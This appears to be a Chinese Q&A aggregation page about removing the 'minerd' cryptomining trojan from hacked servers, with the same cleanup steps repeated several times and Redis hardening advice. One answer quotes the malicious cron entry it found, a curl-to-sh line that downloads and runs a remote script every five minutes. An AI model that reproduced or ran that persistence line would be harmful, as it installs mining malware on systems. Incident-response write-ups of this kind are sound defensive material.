minerd挖礦木馬埠

『壹』 怎樣 刪除 mineros.exe 這種挖礦程序

最近一台安裝了Gitlab的伺服器發生了高負載告警，Cpu使用情況如下：

讓後登錄到伺服器，利用top查看CPU使用情況，這個叫minerd的程序消耗cpu較大，如下圖所示：

這個程序並不是我們的正常服務程序，心裡一想肯定被黑了，然後就搜索了一下這個程序，果真就是個挖礦木馬程序，既然已經知道他是木馬程序，那就看看它是怎麼工作的，然後怎麼修復一下後門。

這個程序放在/opt/minerd下，在確定跟項目不相關的情況下判斷是個木馬程序，果斷kill掉進程，然後刪除/opt下minerd文件。

展

『貳』 狗狗幣挖礦 狗狗幣怎麼挖

一、下載cpu挖礦工具 地址https://sourceforge.net/projects/cpuminer/files/

四、運行start.bat

(2)minerd挖礦木馬埠擴展閱讀:

Dogecoin，有人稱作「狗狗幣/狗幣」，誕生於2013年12月8日，基於Scrypt演算法，是國際上用戶數僅次於比特幣的第二大虛擬貨幣。

數字貨幣是民間發起的全球通用貨幣，不屬於某個國家，是屬於全人類，具有全球轉帳速度快的優點，如幾秒內就可以把錢由國內匯到美國，且費用低廉，並且總量不會像法幣一樣隨意增發，總量相對穩定。

礦機，就是用於賺取虛擬幣的電腦，這類電腦一般有專業的挖礦晶元，多採用燒顯卡的方式工作，耗電量較大。用戶用個人電腦下載軟體然後運行特定演演算法，與遠方伺服器通訊後可得到相應虛擬幣，是獲取比特幣的方式之一。

虛擬幣是指互聯網上面的一種虛擬出來的金錢。即高科技中代替實體貨幣流通的信息流或數據流。在信息技術高速發展的今天，實體貨幣遠遠不能滿足人們的資金流動需求了。

虛擬貨幣與支票和電匯不同，虛擬貨幣不能實現的價值，不能通過銀行轉賬，目前只能流通於網路世界，虛擬貨幣是由各網路機構自行放行，沒有形成統一的發行和管理規范。

『叄』 怎麼清除這個進程：monero cpu miner

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROPandiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

[plain] view plain

『肆』 沒有root許可權 minerd木馬怎麼清除

就是你沒有最高許可權，因為一般現在的手機對用戶是不開放最高許可權(害怕用戶刪除系統文件，導致手機系統崩潰，變板磚了~ ~)，這時候就要刷機，可個360手機助手裡的刷機軟體，不過那個只能刷一部分，別的刷不了的只能自己去網上找教程一步一步來了

『伍』 minerd.exe是什麼

這是cpu挖礦的文件（不排除有病毒冒充哦）如果對你沒用可以刪除

『陸』 minerd挖礦工具軟體是不是不能在平板電腦上運行

Minerd挖礦工具（適用於SRC/QRK/OFF挖礦）適用64位Windows操作系統，32位windows的用戶可以不必下載。

『柒』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『捌』 怎麼清除這個進程monero cpu miner

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROPandiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

[plain] view plain

『玖』 win7--64位系統minerd-x64-corei7.exe進程

沒什麼用 可能是插件